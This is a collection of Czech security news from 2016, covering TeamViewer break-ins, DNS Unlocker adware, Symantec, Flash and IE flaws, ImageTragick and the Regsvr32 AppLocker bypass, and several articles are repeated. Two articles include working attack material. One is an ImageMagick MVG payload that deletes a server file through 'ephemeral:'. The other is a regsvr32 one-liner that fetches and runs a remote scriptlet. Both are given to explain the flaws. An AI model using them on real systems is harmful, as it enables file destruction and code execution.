Pokud zaregistrujete nevyžádané reklamy, zejména v případě, pokud mají dole v patičce uveden původ DNS Unlocker, zkontrolujte si nastavení DNS serverů v pokročilém menu nastavení TCP/IP.
Pokud spatříte pop-up okno s nabídkou nějakého druhu podpory, buďte extrémně opatrní a před jakýmkoli dalším krokem si zkontrolujte nastavení DNS.
Pokud máte jakékoli pochybnosti o nastavení DNS, můžete odstranit podezřelé položky na kartě DNS na stránce pokročilých nastavení TCP/IP. Kontrolou počítače pomocí ESET Online Scanner odstraníte malware DNS Unlocker a zastavíte manipulaci s nastavením DNS.
Dodržujte všechna základní pravidla pro bezpečné používání internetu, včetně toho, abyste používali kvalitní bezpečnostní řešení.

TeamViewer konečně reaguje: zavádí přísnější ochranu přístupu
27.7.2016 Zdroj: Živě Zranitelnosti
Série útoků na počítače s TeamViewerem se konečně dostává z fáze obviňování, kdo za co může, ke zveřejňování konkrétních řešení.

Není jisté, jestli hacky stále pokračují, ani specifický způsob útoku. Už by ale neměly tolik škodit. PayPal nyní už velmi dobře ví o útocích a bez větších problémů vrací peníze na vytunelované účty. Stačí spolu s žádostí poslat logy TeamVieweru a historii navštívených stránek v čas připojení. Podobně reagují i Microsoft, Amazon a eBay.

Bezpečnost
Používáte Teamviewer? Mnoho uživatelů hlásí úspěšný hack počítače

Konečně se rozhoupal i TeamViewer. Jen úplně neustoupil od rétoriky obviňování uživatelů z používání stejných hesel na více službách, i když řada uživatelů měla unikátní kvalitní heslo. Především ale nyní zavedl větší ochranu.

Už bude monitorovat nestandardní přihlašování a pokud bude něco podezřelé, vyžádá si změnu hesla. Další ochrana by pak měla pomoci i pokud chyba spočívá v úplném obejití hesla. Na počítači, na kterém se poprvé přihlásíte ke svému účtu, budete muset dodatečně potvrdit autorizaci e-mailem, který vám dojde na vaši adresu. Útočníci se přihlašovali z Číny nebo Jižní Koreje a až podezřele snadno procházeli autentizačním procesem. Nově zavedené ochrany by to měly znemožnit.

To ale nemění nic na tom, že reputace TeamVieweru dostala těžkou ránu. Lidé jej houfně odinstalovávají a hledají vhodné alternativy. Zřejmě i tento velký exodus uživatelů přiměl TeamViewer k rychlé reakci. Teď ještě zjistit, kde se opravdu stala chyba.

Používáte Teamviewer? Mnoho uživatelů hlásí úspěšný hack počítače
27.7.2016 Zdroj: Živě Zranitelnosti
Důvěra v Teamviewer se otřásá v základech. V uplynulých dnech začalo velké množství uživatelů hlásit průnik do jejich počítačů přes Teamviewer. Útočníci vysáli peníze z PayPalu a nakoupili dárkové poukazy na Amazonu.

Postižení uživatelé přitom často měli unikátní silné heslo pro Teamviewer a někteří hlásí úspěšný průnik i přes použití dvoufaktorového ověřování. Útočníky zastavuje případný přihlašovací dialog k systému.

673067295

Příběhy uživatelů se plní kanál na Redditu a často jde o hororové příběhy. Tisíce vysátých dolarů z PayPalu nebo elektronické nákupy na Amazonu, které nepotřebují doručení na adresu. I když nejste přihlášeni k PayPalu, do pošty se útočníci často dostanou a mohou si vyžádat změnu hesla.

Samotná firma Teamviewer GmbH nereaguje úplně přesvědčivě. Vydala tiskové prohlášení s datem z minulého týdne, byť reaguje na aktuální události, ve kterém se zříká jakýchkoli pochyb a veškerou vinu hází na uživatele a jejich slabá hesla. Stejně tak několik hodin nefungovaly servery Teamvieweru, což údajně s aktuální kauzou nesouviselo. Pochyby budí především plošné odmítnutí veškeré zodpovědnosti a poukazování na slabá hesla, když jsou postižení i lidé s dobrým zabezpečením.

Zkontrolujte si v logu TeamVieweru (C:\Program Files (x86)\TeamViewer soubor s příponou .LOG), zda tam nemáte vzdálené přístupy "Starting desktop process" v nezvyklých časech. Počítače s běžícím TeamViewerem také zamykejte, aby tam byla dodatečná ochrana.

Google vytvoří seznam ostudy. Budou tam výrobci, kteří flákají upgrady Androidu
27.7.2016 Zdroj: Živě Zranitelnosti
Google podle Bloombergu chystá jakýsi seznam ostudy, který bude evidovat výrobce telefonů a tabletů s prehistorickými verzemi Androidu. Většina zařízení na trhu totiž používá Android 4.x – KitKat a dokonce čtyři roky starý Jelly Bean.

Novější Android 5.x Lollipop používá 35 % zařízení přistupujících k Play Storu a nejnovější Android 6 Marshmallow pak 7,5 % zařízení.

259320403
Zastoupení verzí Androidu na aktivních telefonech a tabletech s Androidem přistupujících ke službám Play na počátku května

Otázkou ovšem zůstává, jestli bude mít podobný seznam ostudy nějaký dopad, o verzi Androidu se totiž zpravidla zajímají jen poučení geekové a mnozí prodejci dokonce ani neuvádějí konkrétní verzi systému ve specifikaci produktu v jejich katalogu.

Běžným spotřebitelům je konkrétní verze mobilního systému často lhostejná a výrobci to kvitují, upgrade již prodaného telefonu je totiž jejich optikou vlastně investice navíc, která ke všemu vede jen k tomu, že oddálí nákup nového telefonu.

Tradičně tak nejnovější verzí Androidu disponují především telefony z programu Nexus. Čistý Android bez dalších nadstaveb a funkčních vychytávek však nemusí každému vyhovovat. Nexus je tak vhodný především pro androidí puristy.

FBI využívá ke sledování díru, která je zřejmě i ve Firefoxu. Mozilla chce chybu znát, ale neuspěla ani u soudu
27.7.2016 Zdroj: SecurityWorld Zranitelnosti
Američtí federální vyšetřovatelé z FBI objevili díru v zabezpečení internetového prohlížeče Tor Browser, díky které mohli sledovat a dopadnout uživatele serveru s dětskou pornografií. Tor Browser je však prohlížeč postavený na Firefoxu a je docela možné, že se chyba v zabezpečení týká i Firefoxu samotného. Mozilla by se proto o ní ráda dozvěděla, ale FBI odmítá objevenou chybu prozradit.

Když to nešlo běžnou domluvou, zkusila to Mozilla dokonce u soudu. Ten se však nyní postavil na stranu FBI a rozhodl, že vyšetřovatelé kýženou informaci Mozille poskytovat nemusí, informuje Computerworld.

Mozilla se opírá především o argumenty založené na tom, že pokud by se chyba týkala i Firefoxu, byla by ohrožena bezpečnost počítačů milionů uživatelů. Pokud o chybě v zabezpečení ví FBI, může o ni vědět i někdo jiný a zneužívat ji.

Zajímavý případ připomíná nedávný podobný spor Applu. Po firmě vyšetřovatelé původně chtěli, aby jim poskytla přístup k zašifrovaným datům v úložišti iPhonu kvůli vyšetřování. Požadavek byl adekvátní, ale Apple nepomohl s tím, že ze zašifrovaného telefonu nemá jak data dostat a že neexistují žádná "zadní vrátka". V FBI nakonec zabezpečení nějak pokořili. Apple chtěl pochopitelně vědět jak, protože by to mohlo znamenat bezpečnostní díru v iPhonu. Ale podobně jako Mozilla neuspěl.

Nová chyba ve Windows vás zahltí nechtěnou reklamou

8.6.2016 Zdroj: ComputerWorld Zranitelnosti
Nová verze malwaru DNS Unlocker umožňuje měnit výchozí konfiguraci DNS, díky čemuž může zasažené uživatele začít zásobovat nadměrnou reklamou.
Analytici Esetu detekovali novou verzi adwaru DNS Unlocker s unikátní schopností měnit výchozí konfiguraci DNS. Typickým příkladem, jak DNS Unlocker ovlivňuje napadený počítač, je zobrazování reklam, které jako zdroj uvádí DNS Unlocker, a několika variantami podvodných stránek upozorňujících na údajnou nákazu počítače.

Analytici zjistili, že nový typ DNS Unlocker dokáže oklamat operační systém Windows tak, aby zobrazoval jiné hodnoty nastavení DNS, než je tomu ve skutečnosti.

Možná preventivních opatření podle Esetu:

Neopravená chyba ve WordPress pluginu ohrožuje tisíce webů

27.7.2016 Zdroj: ComputerWorld Zranitelnosti
Vada v zásuvném modulu Mobile Detector v oblíbeném systému pro správu obsahu umožnil hackerům nahrát škodlivá data na servery.
Během posledního týdne se útočníkům podařilo zneužít chybu, která se objevila v oblíbeném WP Mobile Detector pluginu, instalovaném na více než 10 tisíc webových stránkách.

Aby útočníci mohli vadu v resize.php zneužít, musí server mít povolenu funkci allow_url_fopen. To do jisté míry limituje nebezpečnost závady.

Protože není jasné, kolik webových stránek bylo nakaženo, je dobrý nápad, jste-li uživatelem dané aplikace, zkontrolovat svůj server.

Kritická chyba v antivirech Symantec a Norton umožňuje atak hackerů

27.7.2016 Zdroj: ComputerWorld Zranitelnosti
Chyba v jádru antiviru, užívaném hned v několika produktech firmy Symantec, je velmi snadno zneužitelná. Podle bezpečnostního technika Googlu, Tavise Ormandyho, který chybu objevil, může být zranitelnost zneužitá ke spuštění nakaženého kódu na počítačích, a to i vzdáleně.
Jediné, co útočník musí udělat, je poslat e-mail s vadným souborem jako přílohu nebo přesvědčit uživatele, aby klikl na nebezpečný odkaz.

Samotné spuštění souboru již není třeba: Jádro antiviru používá ovladač k zachycení všech systémových operací a automaticky soubor „projede“ ve chvíli, kdy jakkoli pronikne do systému.

Již v pondělí firma chybu opravila v Anti-Virus Engine (AVE) aktualizaci verze 20151.1.1.4 skrze službu LiveUpdate. Bezpečnostní vadou je přetečení bufferu, které mohlo nastat během parsování spustitelných souborů s vadným záhlavím.

Přípona souboru nehraje roli, má-li záhlaví označující jej jako přenosný spustitelný soubor, zapackovaný pomocí ASPacku, komerčního kompresního softwaru.

Zdaleka nejhorší zprávou však je, že Symantec AVE takové soubory rozbaluje uvnitř kernelu, tedy přímo v jádru operačního systému, oblasti s nejvyššími pravomocemi. To znamená, že úspěšné nakažení systému může vést ke kompletní ztrátě moci nad celým systémem.

„Na Linuxu, Macu a dalších unixových platformách může tento proces způsobit vzdálené přetečení heapu (haldy) v procesech Symantecu nebo Nortonu,“ vysvětluje Ormandy v článku k tématu. „Ve Windows tento proces vede k přetečení paměti přidělené kernelu, jak je sken jádra v kernelu postupně načítán, což z toho činí vzdálenou zranitelnost ring0 memory corruption – o moc horší už to být nemůže.“

Symantec zranitelnost ohodnotil na škále CVSS na 9,1 z 10 maximálních, tedy jako extrémně nebezpečnou.

„Nejčastější ukazatel úspěšného útoku by bylo okamžité selhání systému, tedy modrá obrazovka smrti ,“ popsala společnost v článku.

Uživatelé by se měli ujistit, že nainstalovali nejnovější možné aktualizace, dostupné pro jejich Symantec antivirové produkty.

Jde o nejnovější z dlouhé řady kritických chyb nalezených Ormandym a jinými bezpečnostními analytiky v antivirových produktech z posledních let. Většina z nich nepřestává výrobce antivirů kritizovat za jejich tendenci pokračovat s nebezpečnými skeny souborů, které v minulosti vedly ke zneužití chyb pomocí získaných pravomocí kernelu.

Flash Player opět terčem útoků, Adobe varuje před kritickým zneužitím

27.7.2016 Zdroj: ComputerWorld Zranitelnosti
Adobe Systems momentálně řeší kritickou zranitelnost ve Flash Playeru, kterou se již hackerům podařilo zneužít. Mezitím firma vydala opravy pro další zasažené aplikace, kterými jsou Reader, Acrobat a ColdFusion, na záplatě pro Flash Player se ale ještě pracuje.
Chyba je zaznamenaná jako CVE-2016.4117 a týká se verzí Flash Playeru 2.0.0.226 a starších pro Windows, OS X, Linux a Chrome OS. Úspěšné zneužití chyby umožňuje útočníkovi převzít vládu nad systémem.

„Adobe si je vědomo zpráv, že hack na CVE-2016-4117 existuje,“ píše společnost v článku zveřejněném v úterý. „Adobe tuto zranitelnost opraví v naší každoměsíční bezpečnostní aktualizaci, náplánované na 12. květen.“

V úterý také firma vydala balíček aktualizací pro Reader a Acrobat, které dohromady opraví 92 chyb. Většina z nich je hodnocená jako kritická.

Zranitelné verze zahrnují Acrobat DC a Reader DC 15.010.20060 a starší, 15.006.30121 a starší, a také Acrobat XI a Reader XI 11.0.15 a starší. Uživatelé si mohou produkt aktualizovat ručně kliknutím na „pomoc“ a následně „zkontrolovat dostupnost aktualizací“ v české verzi.

Firma také vydala aktualizace pro svůj ColdFusion aplikační server. Tyto aktualizace cílí na zranitelnost s ověřením validity vstupu, která mohla vést k mezistránkovým scripting útokům, na problém s ověřením host name, který způsoboval problém u wild card certifikátů, a na Java deserializační chybu v knihovně Apache Commons Collections.

Adobe radí uživatelům nainstalovat ColdFusion (verzi z roku 2016) Update 1, ColdFusion 11 Update 8 nebo ColdFusion 10 Update 19, podle toho, kterou vezi aplikace mají.

Instalace ColdFusion bývají cílem útočníků. V roce 2013 výzkumníci zjistili větší útok, kde hackeři zneužili zranitelností v ColdFusion a nainstalovali díky nim malware na IIS servery Microsoftu.

Kritická chyba v antivirech Symantec a Norton umožňuje atak hackerů

18.5.2016 Zranitelnosti
Chyba v jádru antiviru, užívaném hned v několika produktech firmy Symantec, je velmi snadno zneužitelná. Podle bezpečnostního technika Googlu, Tavise Ormandyho, který chybu objevil, může být zranitelnost zneužitá ke spuštění nakaženého kódu na počítačích, a to i vzdáleně.

Jediné, co útočník musí udělat, je poslat e-mail s vadným souborem jako přílohu nebo přesvědčit uživatele, aby klikl na nebezpečný odkaz.

Přípona souboru nehraje roli, má-li záhlaví označující jej jako přenosný spustitelný soubor, zapackovaný pomocí ASPacku, komerčního kompresního softwaru.

Symantec zranitelnost ohodnotil na škále CVSS na 9,1 z 10 maximálních, tedy jako extrémně nebezpečnou.

„Nejčastější ukazatel úspěšného útoku by bylo okamžité selhání systému, tedy modrá obrazovka smrti ,“ popsala společnost v článku.

Uživatelé by se měli ujistit, že nainstalovali nejnovější možné aktualizace, dostupné pro jejich Symantec antivirové produkty.

Aktualizace opravují nebezpečné trhliny v Internet Exploreru i Windows

13.5.2016 Zranitelnosti
V rámci pravidelných měsíčních updatů vydala společnost Microsoft i záplaty pro chyby, které byly odhaleny v operačním systému Windows a webových prohlížečích Internet Explorer a Edge. S instalací aktualizací by lidé neměli otálet, protože opravují kritické zranitelnosti.
V produktech amerického softwarového gigantu bylo nalezeno dohromady sedm kritických chyb. Je velmi pravděpodobné, že po jejich oficiálním odhalení se je budou snažit zneužít počítačoví piráti.

Kromě operačního systému Windows a zmiňovaných webových prohlížečů byly stejně nebezpečné trhliny nalezeny také v kancelářském balíku Office. Jedna z trhlin se týká také enginu VBScript, tedy skriptovacího jazyku určeného ke vkládání kódu do webových stránek.

Rizika jsou velká
Jako kritické jsou vždy označovány chyby, jež mohou kyberzločinci zneužít k tomu, aby do počítače propašovali prakticky libovolného nezvaného návštěvníka.

Stačí jim k tomu vytvořit podvodnou internetovou stránku, prostřednictvím které vzdáleně spustí škodlivý kód. Touto cestou se mohou dostat k souborům uloženým na pevném disku i sestavu na dálku ovládnout.

S instalací neotálet
Vedle updatů pro kritické bezpečnostní chyby vyšla řada aktualizací, které jsou označeny jako důležité. Ani s jejich instalací by uživatelé neměli otálet, protože mohou mít vliv na funkčnost samotného operačního systému Windows nebo některých programů.

Stahovat všechny opravy pro kritické a důležité trhliny, které vyšly společně s balíkem pravidelných běžných aktualizací, je možné prostřednictvím služby Windows Update.

Flash Player opět terčem útoků, Adobe varuje před kritickým zneužitím

12.5.2016 Zranitelnosti
Adobe Systems momentálně řeší kritickou zranitelnost ve Flash Playeru, kterou se již hackerům podařilo zneužít. Mezitím firma vydala opravy pro další zasažené aplikace, kterými jsou Reader, Acrobat a ColdFusion, na záplatě pro Flash Player se ale ještě pracuje.

Chyba je zaznamenaná jako CVE-2016.4117 a týká se verzí Flash Playeru 2.0.0.226 a starších pro Windows, OS X, Linux a Chrome OS. Úspěšné zneužití chyby umožňuje útočníkovi převzít vládu nad systémem.

V úterý také firma vydala balíček aktualizací pro Reader a Acrobat, které dohromady opraví 92 chyb. Většina z nich je hodnocená jako kritická.

Adobe radí uživatelům nainstalovat ColdFusion (verzi z roku 2016) Update 1, ColdFusion 11 Update 8 nebo ColdFusion 10 Update 19, podle toho, kterou vezi aplikace mají.

Už je to evergreen: V IE a Flash Playeru jsou kritické chyby. Mějte aktualizovaný systém
11.5.2016 Zdroj: Zive.cz Zranitelnosti

Microsoft včera vypustil do internetového éteru další várku pravidelných měsíčních záplat (patch tuesday), která tentokrát obsahovala i opravu kritické chyby CVE-2016-0189. Ačkoliv se ji snažil Microsoft udržet do vydání opravy v relativní tajnosti, kyberscéna o ní dobře věděla. Podle Symantecu potěšila třeba hackery v Jižní Koreji.

562427339

Bug v Internet Exploreru (ilustrační obrázek)

A o co vlastně šlo? O další kritickou chybu v Internet Exploreru – ano, už jej opravdu přestaňte používat. Konkrétně se jednalo o zranitelnost v jeho jádře pro běh Javascriptu (JScript 5.8) a VBS (VBScript 5.7-8), která se týkala verzí IE 9 a vyšších a všech programů, které používaly komponentu IE. Umožňovala spuštění zákeřného kódu.

Pokud jste se ale právě ušklíbli, že IE přeci vůbec nepoužíváte a vlastně ani Windows, raději nepoužívejte ani Flash Player, jednu kritickou chybu totiž včera oznámila i společnost Adobe. Zranitelnost CVE-2016-4117 v jeho Flash Playeru 21.0.0.226 a nižším se týká všech podporovaných platforem a útočník ji může zneužít k pádu aplikace, případně opět ke spuštění záškodnického kódu.

Podobné díry tu byly, jsou a budou, protože kód softwaru je stále komplikovanější a lidé prostě dělají chyby od chvíle, co slezli z afrických stromů, nicméně čím méně proprietárních technologií budeme na webu používat, tím nad ním budeme držet větší kontrolu. Nelze tedy než doufat v to, že stárnoucí Flash Player co nevidět konečně nahradí HTML a Javascript.

Populární linuxový ImageMagick je děravý jako ementál. Drobným hackem jsme smazali soubory
10.5.2016 Zdroj: Zive.cz Zranitelnosti

Hromada webových služeb běžících na linuxovém serveru používá k operacím s obrázky nástroje z balíku ImageMagick. Ty mohou třeba ořezávat a generovat fotografie, provádět jejich konverzi mezi formáty aj. Takovým typickým příkladem použití by mohla být třeba práce s úpravou profilové fotografie uživatele na nějakém webu.

ImageMagick je rychlý a mocný, nabízí totiž obrovské množství konverzních funkcí včetně generování animovaných gifů aj. Jenže kvůli této komplexnosti obsahuje také hromadu kritických chyb (CVE-2016-3714), na které nyní upozornil třeba docela adekvátně pojmenovaný web ImageTragick.

Díky těmto zranitelnostem lze poměrně snadno zneužít konverzní funkce ImageMagicku k nejrůznějším operacím v systému. Pokud například ImageMagick dostane za úkol převést grafiku ve formátu SVG, MVG aj. do něčeho jiného – třeba do rastru PNG, může vstupní soubor obsahovat příkazy, které povedou ke smazání nějakého souboru (pokud na to bude mít ImageMagick práva), ke spuštění příkazu, zavolání HTTP GET, stažení zákeřného kódu z webu aj.

Okamžitě po zveřejnění tedy hackeři vytvořili zákeřné obrázky, které zkoušejí nahrávat na nejrůznější weby, které pracují s grafikou a ví se, že používají ImageMagick. Některé velké hostingové/CDN systémy jako třeba CloudFlare a další už na tyto útoky pamatují ve svých firewallech.

Příklad útoku pomocí zákeřného obrázku

Jak může být takový útok snadný, ukážeme v příkladu níže.

Nejprve si vytvořím zákeřný soubor smazat.mvg v textovém formátu MVG (Magick Vector Graphics):

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:/tmp/pokus.txt'
popgraphic-context
Soubor obsahuje textové instrukce k vytvoření plátna o velikost 640×480 pixelů, na které se má vykreslit na pozici 0;0 obrázek ze souboru /tmp/pokus.txt. Před adresou souboru je ale klíčové slovo ephemeral, které ImageMagicku říká, aby tento soubor poté smazal.

Problém spočívá v tom, že se vůbec nejedná o obrázek, ale že to může být vlastně jakýkoliv soubor, k jehož smazání bude mít proces ImageMagicku právo.

Pokud bych takový soubor poté nahrál na nějakou službu s ImageMagickem, který se na serveru pokusí o konverzi do nějakého jednotného formátu, třeba PNG, provedl by podobnou operaci takto:

convert smazat.mvg smazat.png
V rámci zpracovávání souboru smazat.mvg by pak ImageMagick smazal soubor /tmp/smazat.txt

799742791
ImageMagick je velmi snadno zneužitelný k nekalým operacím

Další příklady primitivních a o to nejbezpečnějších útoků najdete na webu ImageTragick, který zároveň nabízí rady, jak balík aktuálně co nejlépe zabezpečit.

ImageMagick zranitelný, chyba nazvána ImageTragick
4.5.2016 Zranitelnosti

Velmi rozšířený program pro manipulaci s obrázky ImageMagick je zranitelný. Jedna ze zranitelností CVE-2016–3714 umožňuje vzdálené spuštění kódu použitím speciálně upravených obrázků. Také všechny moduly založené na ImageMagick jsou zranitelné, například PHP imagick, Ruby rmagick a paperclip a nodejks imagemagick.

Zranitelnost je pojmenována ImageTragick a jak je již hezkým zvykem má svou stránku a logo. Chyba je prý v současnosti již zneužívána a oprava ještě není hotová. Prozatím je třeba zakázat coders EPHEMERAL, URL, MVG a MSL v policy.xml a kontrolovat vstupní soubory.

Android opravuje šest kritických chyb
3.5.2016 Zranitelnosti
Google jako tradičně na začátku měsíce vydal souhrn oprav pro operační systém Android, nově pod názvem Android Security Bulletin namísto Nexus Security Bulletin. Lehce se také změnila klasifikace závažnosti chyb. Tentokrát bylo opraveno šest kritických chyb, konkrétně v kernelu, ovladači Nvidia, ovladačích Qualcommu nebo v mediaserveru.

Partneři, obvykle výrobci zařízení s Androidem, byli o chybách informováni už s měsíčním předstihem, aby mohli připravovat opravy. Za jak dlouho a v jaké míře se k uživatelům dostanou, ale velmi záleží na konkrétním výrobci. Řada Nexus dostává aktualizaci souběžně s vydáním bulletinu. Google nemá zprávy o zneužívání žádné z chyb v praxi.

Windows 10 mají kritickou zranitelnost

2.5.2016 Zranitelnosti
V operačním systému Windows 10 byla nalezena nová kritická zranitelnost. Kyberzločinci ji mohou zneužít k tomu, aby uživateli podstrčili prakticky libovolný škodlivý kód. Upozornil na to server BRG.
Chybu odhalil bezpečnostní výzkumník Casey Smith. Trhlina se týká programu s názvem Regsvr32, respektive Regsvr64 v případě 64bitové verze systému. Jde v podstatě o nástroj příkazového řádku, který může registrovat různé ovládací prvky v operačním systému.

Kvůli chybě může být zmiňovaný program zneužit ke spuštění prakticky libovolného kódu na cizím počítači. Útočník k tomu nepotřebuje ani práva administrátora. Jediné, co musí udělat, je donutit uživatele spustit v jeho počítači předem připravený škodlivý kód. Ten se může šířit například prostřednictvím nevyžádaných e-mailů.

Kritickou chybu mohou obsahovat i starší verze Windows.
Podle Smithe je problém v tom, že kvůli chybě není nezvaný návštěvník rozpoznán aplikací AppLocker. Ta běžně slouží k rozeznávání důvěryhodných zdrojů ke spouštění aplikací. V praxi to tedy znamená, že na uživatele nevyskočí ani žádná hláška, že by si měl na danou instalaci dát pozor.

Regsvr32 je nedílnou součástí operačního systému Windows už od dob verze XP. Výzkumník však chybu identifikoval zatím pouze v nejnovějších desítkách. Zda ji obsahují také starší verze operačního systému od amerického softwarového gigantu, zatím není jasné.

Záplata zatím chybí
Microsoft zatím pro kritickou zranitelnost nevydal žádnou bezpečností záplatu. Uživatelé sice mohou program Regsvr32 (respektive Regsvr64) zablokovat, pouštět do toho by se nicméně neměli méně zkušení uživatelé.

Samozřejmě je také velmi vhodné myslet na to, na co uživatelé během práce na počítači klikají. Úplně ignorovat by měli nevyžádané e-maily a podezřelé zprávy například na sociálních sítích. Stejně jako u většiny podobných chyb ani u té nové totiž kyberzločinci nic nezmůžou bez přičinění samotného uživatele.

Chyba ve Windows 10 umožňuje spustit aplikaci bez vědomí uživatele

2.5.2016 Zdroj: Lupa.cz Zranitelnosti

Těžko si představit, jak je možné, že v nejnovějších Windows můžete na dálku spustit jakoukoliv aplikaci bez vědomí uživatele.
Pokud na počítači s Windows 10 použijete Regsvr32, abyste spustili soubor uložený na vzdáleném systému, podaří se vám to. Bez vědomí uživatele, bez varování před instalací a bude ignorován i případný blacklist (AppLocker). Není potřeba mít práva správce ani nic dalšího. Jediná obrana zatím spočívá v zablokování Regsvr32 na úrovni firewallu (a také Regsvr64).

Důležité je, abyste tuhle zranitelnost pochopili správně – neznamená, že někdo může na dálku na vašem počítači něco spustit. Znamená, že pokud vás (uživatele) někdo přesvědčí ke kliknutí na něco nevhodného, může tím dojít ke spuštění a instalaci čehokoliv, aniž byste si uvědomili, že k něčemu takovému došlo.

Podmínkou samozřejmě je, že něco spustíte (což uživatelé dělají rádi), a také to, že bude dostupný vzdálený systém, který se postará o dodání skriptu. Ten už se pak postará o zbytek.

Podrobnosti přímo od objevitele chyby najdete v Bypass Application Whitelisting Script Protections – Regsvr32.exe & COM Scriptlets (.sct files) a v zásadě stačí použít něco jako „regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll“, ale až tak jednoduché to samozřejmě není. Kompletní proof of concept prozradí více.

Apple končí s QuickTime pro Windows, už ani neopraví známé bezpečnostní chyby

17.4.2016 Zranitelnosti
Apple končí s QuickTime pro Windows, už ani neopraví známé bezpečnostní chybyVčera, Milan Šurkala, aktualitaApple QuickTime pro Windows už má patrně své dny sečteny. Společnost Trend Micro upozornila Apple na dvě bezpečnostní chyby v QuickTime. Podpora této verze aplikace ale má být ukončena a chyby nebudou opraveny.
QuickTime už zdaleka není tak populární jak kdysi a jeho verze pro operační systém Windows má již své dny sečteny. Společnost Trend Micro totiž v 11. listopadu 2015 informovala společnost Apple o dvou kritických bezpečnostních chybách aplikace QuickTime pro Windows, jenž byly označeny jako ZDI-16-241 a ZDI-16-242. Apple dostal 120 dní na reakci, ale v podstatě se nic nedělo. Až ke konci této lhůty, 9. března 2015, na výzvu Apple prohlásil, že QuickTime pro Windows už nebude dále vyvíjen.

To ale současně znamená, že tyto dvě bezpečnostní chyby nebudou nikdy opraveny, půjde o tzv. zero-day problémy a Apple akorát doporučuje majitelům počítačů s operačním systémem Windows QuickTime odinstalovat. Návštěva nebezpečné webové stránky tak může být s nebezpečnou verzí QuickTime nepříjemným zážitkem, zatím ale není znám žádný útok, který by tyto zranitelnosti využil. Problém se netýká QuickTime ve verzi pro Mac OS X a Apple se rozhodl podporu ukončit např. proto, že dnes se ve velké míře využívá HTML5, které je obecně bezpečnější než pluginy instalované do prohlížečů.

Máte ve Windows QuickTime od Applu? Odinstalujte jej co nejdřív
15.4.2016 Zdroj: Živě Zranitelnosti
Přehrávač QuickTime byl v minulosti používán především pro zobrazení videoobsahu v kontejneru MOV. To však lépe zvládne i další konkurence a původní přehrávač Appu tak není třeba. Odinstalace je však na místě především kvůli jeho zranitelnosti. Na blogu bezpečnostní společnosti Trend Micro si můžete přečíst o dvou kritických chybách, které mohou vést k napadení systému.

whatis-hero-windowsxp-20100203.jpg
QuickTime měl smysl možná v době Windows XP, dnes jej pohodlně nahradí kvalitnější konkurence

Zpráva je důležitá především proto, že Apple s velkou pravděpodobností nebude vydávat pro QuickTime pod Windows další záplaty. Ta poslední zamířila k uživatelům v průběhu ledna a postarala se například o automatické odinstalování doplňku pro prohlížeče. Ačkoliv si QuickTime pod Windows společně s iTunes nevybudoval příliš dobrou pověst, jistě se najdou mnozí, kteří jej v systému (třeba nevědomky) stále mají.

Problém se týká Windows 7 a starších systémů. Apple nikdy QuickTime pro Windows 8 či Windows 10 nevydal. A pokud byste snad nevěděli, jak odinstalaci provést, Apple dokonce připravil stručný návod jak na to.

Microsoft opravoval závažné chyby, stáhněte si záplaty
14.4.2016 Zdroj: Živě Zranitelnosti
Microsoft opět uvolnil nadílku bezpečnostních záplat, kterými opravoval závažné i méně závažné chyby ve svých produktech.

Prostor opět dostaly oba internetové prohlížeče, kterými Microsoft disponuje. V obou případech jde o kritické aktualizace. Záplata, která se týká Microsoft Edge, řeší několik chyb, viz Microsoft Security Bulletin MS16-038 (další informace k záplatě).

V případě prohlížeče Internet Explorer se muselo mimo jiné korigovat, jakým způsobem prohlížeč validuje vstupy před nahráváním DLL knihoven i způsob nakládání s objekty v paměti. Záplata je označena jako kritická pro verzi 9 a vyšší je blíže popsána zde: Microsoft Security Bulletin MS16-037.

Problém s fonty i Office

Několik závažných bezpečnostních chyb bylo také třeba záplatovat v grafické komponentě Windows. Kvůli chybě ve způsobu, jakým se zpracovávají upravené vložené fonty však může dojít až ke spuštění škodlivého kódu na počítači nebo jeho ovládnutí. Typicky tak, že uživatel otevře dokument nebo webovou stránku obsahující speciálně upravené vložené fonty. Záplata je kritická nejen pro všechny podporované vydání Windows, ale i .NET Framework, Skype for Business 2016, Microsoft Lync 2013 a Microsoft Lync 2010, viz Microsoft Security Bulletin MS16-039.

Kritickou záplatu si vyžádal i problém odhalený a opravený v Microsoft XML Core Services v rámci Windows. Záplata je kritická pro Microsoft XML Core Services 3.0 na všech podporovaných verzích Windows. Koriguje se jí způsob, jakým MSXML parser zpracovává uživatelské vstupy (Microsoft Security Bulletin MS16-040).

V dubnu byly vydány ještě dvě důležité aktualizace. Jedna se týká kancelářského balíku Office (Microsoft Security Bulletin MS16-042). Záplata, která se týká celého spektra Office produktů upravuje způsob, jakým balíček zachází s objekty v paměti.

Záplatovaný Flash Player i .NET Framework

Dále byla ještě vydána aktualizace pro Adobe Flash Player, přičemž se týká i Windows 10. Onou záplatou se aktualizují (opravují) všechny problematické knihovny Adobe Flashe v rámci prohlížečů Internet Explorer 10, Internet Explorer 11 i Microsoft Edge - Microsoft Security Bulletin MS16-050.

Zbývající záplaty od Microsoftu mají maximální stupeň důležitý. Najdeme mezi nimi například záplatu, která opravuje problém v Microsoft .NET Frameworku. Je důležitá pro Microsoft .NET Framework 4.6 a Microsoft .NET Framework 4.6.1 -Microsoft Security Bulletin MS16-041.

S dalšími záplatami se řešil například problém ve Windows OLE (nekorektně fungující validace uživatelských vstupů) - Microsoft Security Bulletin MS16-044, ve Windows Hyper-V - především na 64-bitových platformách (Microsoft Security Bulletin MS16-045) i ve Client-Server run-time Subsystem (Csrss) v rámci Windows. K zneužití chyby je však třeba, aby se útočník přihlásil na dané zařízení a spustil na něm speciálně upravenou aplikaci - Microsoft Security Bulletin MS16-048.

Zároveň vyšla i nová verze bezplatného bezpečnostního funkce Microsoft Malicious Software Removal Tool. Pro tento měsíc je dostupné vydání s označením 5.35.

Hackeři nepotřebují znát heslo, jednoduše ho smažou

13.4.2016 Zranitelnosti
Bezpečnostní experti kladou uživatelům neustále na srdce, že mají používat sofistikovaná hesla a nikomu je nesdělovat. Jenže občas ochrana heslem nestačí, jak ukazuje nově objevená chyba. Počítačoví piráti se díky ní dostanou do cizí sítě celkem jednoduše, heslo prostě smažou. V ohrožení je podle serveru The Hacker News více než 135 miliónů uživatelů.
Novou trhlinu objevil bezpečnostní výzkumník David Longeneck v zařízení Arris SURFboard SB6141. Jde o modem, který slouží k připojení k internetu přes kabelovou televizi. Hojně je využíván především v USA, není ale vyloučeno, že stejný model využívají také někteří tuzemští uživatelé.

Chyba se týká modemu Arris SURFboard SB6141

